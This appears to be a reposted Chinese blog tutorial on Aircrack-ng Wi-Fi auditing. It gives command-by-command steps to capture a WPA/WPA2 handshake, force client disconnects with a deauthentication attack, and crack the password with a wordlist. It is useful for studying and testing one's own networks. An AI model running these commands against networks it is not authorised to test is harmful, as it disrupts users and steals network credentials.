zoukankan      html  css  js  c++  java
  • 使用Aircrack-ng进行无线安全审计

    设置监听模式

    激活网卡

    ifconfig wlan0 up

    结束占用网络接口的进程

    airmon-ng check kill
    

    开启监听模式

    airmon-ng start wlan0

    查看网卡是否成功开启了监听模式

    iwconfig
    

    Mode状态为Monitor为开启成功,Managed为不成功。

    捕获数据包

    此处须填写监听模式的接口,一般为wlan0mon。

    airodump-ng wlan0mon
    

    按Ctrl+C可停止扫描。 

    airodump-ng -t WPA2 wlan0mon                   #仅捕获WPA2加密方式的数据包
    airodump-ng --bssid 00:25:00:FF:94:73 wlan0mon #指定捕获BSSID的包
    airodump-ng -N Tech-For-Test wlan0mon          #指定捕获ESSID的包
    airodump-ng -c 6 wlan0mon                      #捕获信道为6的包
    

    保存捕获的数据包

    airodump-ng -w packet wlan0mon #将捕获的数据包保存到名为packet的文件中
    

    读取数据包

    airodump-ng -r xxx.pcap        #读取名为xxx.pcap的数据包
    

    这里我们使用以下命令:

    airodump-ng -c 11 -w AirCrk --bssid F0:DB:F8:0C:0B:28 wlan0mon

                           频道号  写入AirCrk文件

    等待右上角出现WPA handshake关键字时说明成功获得到了包含WPA密码的4次握手数据报文,此时可使用aireplay注入。

    若没有看到这个提示,可以增加Deauth的发送数量。

    其他导致无法获取握手报文的原因(摘自Longas的《Linux-BT4黑客手册》):

    1.可能该无线网卡对这些无线工具的支持性不好,比如很多笔记本自带的无线网卡支持性就不好。

    2.无线接入点自身问题,有的AP在遭受攻击后会短时间内失去响应,需重启后等待片刻才能恢复正常工作状态。

    注入数据包

    目的是强制客户端重新连接,从而获取WPA/WPA2握手数据包。(需airodump-ng处于运行状态)

    重新打开一个终端。

    -0表示Deauth攻击模式 5表示发送次数  

    aireplay-ng -0 1 -a A4:2B:8C:7D:98:7D-c F0:DB:F8:0C:0B:28 wlan0mon #使用Deauth攻击模式 破解WPA/WPA2包。

                                  BSSID mac地址             STATION mac地址 

    最后使用加载字典对cap数据包进行破解。

    aircrack-ng -w dic.txt -b F0:DB:F8:0C:0B:28 log-01.cap
    

    如果字典比较大,跑起来可能需要很久,这个过程是很考验RP的,破解成功后会出现下图界面:

    作者:AirCrk
    原文地址:http://www.cnblogs.com/AirCrk/articles/5652589.html

  • 相关阅读:
    Bump Mapping综述 (转)
    二进制表示(转)
    3D局部光照模型 (转)
    关于DEVMODE的数据结构显示设备的属性(转)
    The C++ Programming Language(一)
    The C++ Programming Language(二)
    linux_redhat9下安装FTP服务器
    oracle下用户相关问题整理
    Linux的基本命令学习与shell基本内容学习(2)
    winxp系统32位平台下利用oracle10g自带的DBCA(database configuration assistant)工具创建数据库
  • 原文地址:https://www.cnblogs.com/AirCrk/p/5652589.html
Copyright © 2011-2022 走看看